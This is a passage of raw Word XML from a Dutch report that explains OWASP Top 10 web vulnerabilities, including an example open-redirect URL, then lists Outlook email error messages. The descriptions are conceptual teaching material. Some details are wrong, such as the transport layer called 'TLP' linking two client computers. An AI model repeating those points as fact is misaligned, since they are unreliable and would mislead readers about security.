        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Insecure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Direct Object Reference laat hackers de autorisatie passeren en zorgt ervoor dat resources direct bereikbaar zijn. Door het aanpassen van parameter waarden die direct verwijzen naar objecten in de broncode kunnen hackers de twee opgenoemde actie uitvoeren. Hackers kunnen gebruikersgegevens, bestanden en meer onderscheppen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A46929" w14:textId="77777777" w:rsidR="004F287C" w:rsidRPr="00A60186" w:rsidRDefault="004F287C" w:rsidP="004F287C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A5 Security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Misconfiguration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B6337BC" w14:textId="77777777" w:rsidR="004F287C" w:rsidRDefault="004F287C" w:rsidP="004F287C">
      <w:r>
        <w:t xml:space="preserve">Kwetsbaarheden in de misconfiguratie van servers of webapplicaties kunnen leiden tot een variatie van beveiligingsrisico’s. Hackers kunnen misbruik maken van ontwikkelomgevingen die gebruikt worden voor debuggen en test doeleindes. Misconfiguraties komen tot stand wanneer softwareontwikkelaars niet genoeg aandacht besteden aan het correct configureren van hun systemen. Zoals eerder geschreven zijn er een variatie </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>van acties die kunnen leiden tot misconfiguratie. Zo kan de ontwikkelaar per ongeluk de debugger aan laten staan waar hackers gebruik van kunnen maken door de error berichten uit te lezen om andere kwetsbaarheden te ontdekken ook kunnen mappen in het systeem verkeerde permissie rechten hebben ontvangen waardoor iedereen toegang kan verkrijgen tot deze mappen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285E3271" w14:textId="77777777" w:rsidR="004F287C" w:rsidRPr="00A60186" w:rsidRDefault="004F287C" w:rsidP="004F287C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A6 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Sensitive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Data Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C1D85E" w14:textId="77777777" w:rsidR="004F287C" w:rsidRDefault="004F287C" w:rsidP="004F287C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sensitive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Data Exposure gaat over gevoelige data dat blootgesteld is en dus publiekelijk beschikbaar is voor iedereen.  Gevoelige data is kostbare data dat de eigenaar liever niet openbaar deelt met de buitenwereld, maar liever verbogen wilt houden om veiligheidsredenen. Dit betreft bank informatie (creditkaart nummer, rekeningnummer), patiënt informatie, persoonlijke informatie (BSN, adresgegevens), onlinegegevens (gebruikersnamen, wachtwoorden). Het verliezen van deze gevoelige data kunnen gevolgen hebben tot financiële schade, identiteit fraude en afname van consumentenvertrouwen. Er zijn verschillende oorzaken van deze kwetsbaarheid een veel voorkomende vorm is een matig beveiligd Tansport laag (TLP). Het transport laag beheert de communicatie tussen twee cliënt computers, als deze niet goed beveiligd is dan kunnen hackers hiervan misbruik maken en een zogeheten “man in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>middle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attack” uitvoeren. Hierbij maken zij verbinding met de slecht beveiligde TLP-verbinding en onderscheppen zij de gevoelige data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67965447" w14:textId="77777777" w:rsidR="004F287C" w:rsidRPr="00A60186" w:rsidRDefault="004F287C" w:rsidP="004F287C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A7 Missing Function Level Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2C2899" w14:textId="77777777" w:rsidR="004F287C" w:rsidRDefault="004F287C" w:rsidP="004F287C">
      <w:r>
        <w:t xml:space="preserve">Websites die server </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> kunnen afhandelen maar niet goed valideren op de authenticatie en autorisatie van deze </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> kunnen zijn kwetsbaar voor Missing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Level Access Control. De vragen die de ontwikkelaar of de beheerder van de website moet stellen om achter te komen of er daadwerkelijk spraken is van deze kwetsbaarheid zijn: “Kan een gebruiker direct surfen naar een resource, Stelt de UI een onbevoegde resource bloot en is de server alleen afhankelijk van de gebruikersinput?”. Een voorbeeld van de kwetsbaarheid is als een gewone gebruiker toegang kan verkrijgen tot de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pagina wat dus betekent dat er een functie mist die check of de gewone gebruiker wel bevoegd is om toegang te verkrijgen tot de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pagina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721E3245" w14:textId="77777777" w:rsidR="004F287C" w:rsidRPr="00A60186" w:rsidRDefault="004F287C" w:rsidP="004F287C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A8 Cross Site Request Forgery Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7B8638" w14:textId="77777777" w:rsidR="004F287C" w:rsidRDefault="004F287C" w:rsidP="004F287C">
      <w:r w:rsidRPr="001D4F2E">
        <w:t xml:space="preserve">Cross Site Request </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4F2E">
        <w:t>Forgery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4F2E">
        <w:t xml:space="preserve"> Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD8BD48" w14:textId="77777777" w:rsidR="004F287C" w:rsidRPr="001D4F2E" w:rsidRDefault="004F287C" w:rsidP="004F287C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CSRF is een veel exploiteerde kwetsbaarheid die het mogelijk maakt voor hackers om de gedupeerde gebruikers te forceren om actie uit te laten voeren in een webapplicatie, terwijl zij er niets van afweten. Hackers misbruiken deze kwetsbaarheid op websites waar gevoelige data gewaarborgd wordt en die veel functionaliteiten biedt om deze data te beheren. Onder websites die de hackers als meestal als doelwit kiezen behoren </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>social</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> media, online bankier en webshops. Uit een report van IBM is gebleken dat van alle geteste webapplicaties (900 dynamische webapplicaties) waren er 23% kwetsbaar tegen CSRF-aanvallen [IBM X-Force </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Threat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Intelligence, 2014 2Q]. </w:t>
      </w:r>
      <w:r w:rsidRPr="001D4F2E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Het </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4F2E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>onderzoek</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4F2E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4F2E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>verricht</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4F2E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> door de IBM Hosted Application Security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D4F2E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Managementservice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D4F2E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> (HASM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E229B4" w14:textId="77777777" w:rsidR="004F287C" w:rsidRPr="00A60186" w:rsidRDefault="004F287C" w:rsidP="004F287C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A9 Using Components with Known Vulnerabilities Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C66C139" w14:textId="77777777" w:rsidR="004F287C" w:rsidRDefault="004F287C" w:rsidP="004F287C">
      <w:r w:rsidRPr="008E5092">
        <w:t xml:space="preserve">Deze kwetsbaarheid betreft het gebruik van herbruikbare softwarecomponenten zoals open source </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E5092">
        <w:t>libraries</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E5092">
        <w:t xml:space="preserve">. Online is er een berg aan software </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E5092">
        <w:t>libraries</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E5092">
        <w:t xml:space="preserve"> te vinden en ontwikkelaar maken hier gebruik van om het ontwikkelproces van een softwareapplicatie te versnellen omdat zij dan zelf een bepaalde functionaliteit hoeven te programmeren. Waarom het wiel op nieuw uitvinden als het werk al door een ander gedaan is? Het probleem met deze derde partij softwarecomponenten is dat zij vaak verouderde code bevatten, soms wel ouder dan 15 jaar. De software wordt meestal vrijwillig onderhouden en dat maakt het ook dat het kwalitatief niet hoogstaand is. In 2014 was er een kwetsbaarheid gevonden in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E5092">
        <w:t>OpenSSL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E5092">
        <w:t xml:space="preserve"> versies 1.0.1 tot 1.0.1f. Hackers kunnen bij het exploiteren van deze kwetsbaarheid gevoelige data blootstellen zoals gebruikersgegevens en geheime sleutel [OWASP, 2017].</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0F7196" w14:textId="77777777" w:rsidR="004F287C" w:rsidRPr="00A60186" w:rsidRDefault="004F287C" w:rsidP="004F287C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A10 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Unvalidated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Redirects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A60186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Forwards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425195CF" w14:textId="49CCC361" w:rsidR="00B770B1" w:rsidRDefault="004F287C" w:rsidP="00D81245">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redirects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> die niet gevalideerd zijn kunnen hackers misbruiken om gebruikers van een webapplicaties te verwijzen naar een verkeerde website. Geregeld verwijzen webapplicaties hun gebruikers naar een ander pagina, dit kan direct gedaan worden door de gebruiker door bijvoorbeeld op een hyperlink te klikken of indirect door de webapplicatie na een actie van een gebruiker zoals bij het inloggen. Hackers kunnen bij het exploiteren van deze kwetsbaarheid de bestemming van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redirects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> wijzigen. Een voorbeeld van deze kwetsbaarheid is een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> meegeven aan een GET </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zoals:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId91" w:history="1">
        <w:r w:rsidR="006D4010" w:rsidRPr="0028560A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.testwebsite.nl/redirect.php?id=http://testlink.nl</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CBBF9F" w14:textId="440623A1" w:rsidR="006D4010" w:rsidRDefault="006D4010" w:rsidP="00D81245"/>
    <w:p w14:paraId="3A91A125" w14:textId="38674FC9" w:rsidR="00367575" w:rsidRPr="00BE52FD" w:rsidRDefault="00367575" w:rsidP="00D81245">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE52FD">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>UC-4</w:t>
      </w:r>
      <w:r w:rsidR="00BE52FD" w:rsidRPr="00BE52FD">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> informatie 4.4a</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BE52FD" w:rsidRPr="004C7B30" w14:paraId="67EC34D0" w14:textId="77777777" w:rsidTr="00BE52FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="520D6BC5" w14:textId="3AB7639E" w:rsidR="00BE52FD" w:rsidRPr="00573901" w:rsidRDefault="007504B4" w:rsidP="006D4010">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00061B13">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Errors bij het verzenden van </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00061B13">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>emails</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00573901">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (vertalen)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE52FD" w:rsidRPr="00422628" w14:paraId="4CC76286" w14:textId="77777777" w:rsidTr="00BE52FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BB2FE01" w14:textId="1EB1106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No connection could be made because the target machine actively refused it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE52FD" w:rsidRPr="00422628" w14:paraId="75E64A3E" w14:textId="77777777" w:rsidTr="00BE52FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="181B99C1" w14:textId="70C2408A"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server could not be found. (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BE52FD">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>Account:</w:t>
            </w:r>
            <w:r w:rsidRPr="00BE52FD">
              <w:rPr>
                <w:rStyle w:val="sbody-italic"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>account</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00BE52FD">
              <w:rPr>
                <w:rStyle w:val="sbody-italic"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> name</w:t>
            </w:r>
            <w:r w:rsidRPr="00BE52FD">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE52FD">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>POPserver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE52FD">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>:'mail', Error Number: 0x800ccc0d).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE52FD" w14:paraId="098DDCEA" w14:textId="77777777" w:rsidTr="00BE52FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EBB1128" w14:textId="031CD42B" w:rsid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xml:space="preserve"> - Sending and Receiving' reported error (0x800ccc0f): 'The connection to the server was interrupted. If this problem continues, contact the server administrator or Internet service provider (ISP). </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">The server </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>responded</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>: </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE52FD" w:rsidRPr="00422628" w14:paraId="70A78A81" w14:textId="77777777" w:rsidTr="00BE52FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2260A506" w14:textId="7499497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Your server has unexpectedly terminated the connection. Possible causes of this include server problems, network problems, or a long period of inactivity. Account. </w:t>
            </w:r>
            <w:r w:rsidRPr="00BE52FD">
              <w:rPr>
                <w:rStyle w:val="sbody-italic"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>account name</w:t>
            </w:r>
            <w:r w:rsidRPr="00BE52FD">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>, Server: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Protocol: POP3, Server Response: '+OK', Port: 110, Secure(SSL): No, Error Number: 0x800ccc0f.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE52FD" w:rsidRPr="00422628" w14:paraId="59899EFF" w14:textId="77777777" w:rsidTr="00BE52FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="667960F6" w14:textId="648F29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SMTP server name</w:t>
            </w:r>
            <w:r w:rsidRPr="00BE52FD">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="000000"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t> - Sending and Receiving' reported error (0x80042109): 'Outlook is unable to connect to your outgoing (SMTP) e-mail server. If you continue to receive this message, contact the server administrator or Internet service provider (ISP).'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE52FD" w:rsidRPr="00422628" w14:paraId="5DA46B1D" w14:textId="77777777" w:rsidTr="00BE52FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FA5907B" w14:textId="611B11C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operation timed out waiting for a response from the receiving (POP) server 0x8004210a.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE52FD" w:rsidRPr="00422628" w14:paraId="3FF69258" w14:textId="77777777" w:rsidTr="00BE52FD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07AE2CBA" w14:textId="59F2DB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A time-out occurred while communicating with the server 0x800ccc19.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="791EA242" w14:textId="77777777" w:rsidR="00BA22A6" w:rsidRDefault="00BA22A6"/>
    <w:p w14:paraId="095921EA" w14:textId="77777777" w:rsidR="00B94C8B" w:rsidRDefault="00B94C8B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D185D91" w14:textId="77777777" w:rsidR="002856DD" w:rsidRDefault="002856DD" w:rsidP="002856DD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc491022102"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Kwaliteit attributen</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="49F4ED60" w14:textId="77777777" w:rsidR="002856DD" w:rsidRDefault="002856DD" w:rsidP="002856DD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9049" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2109"/>
        <w:gridCol w:w="6940"/>
      </w:tblGrid>
      <w:tr w:rsidR="00063450" w14:paraId="0FA4B815" w14:textId="77777777" w:rsidTr="00063450">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2109" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E2A81F2" w14:textId="57697503" w:rsidR="00063450" w:rsidRDefault="00063450" w:rsidP="00063450">
            <w:pPr>
              <w:jc w:val="left"/>
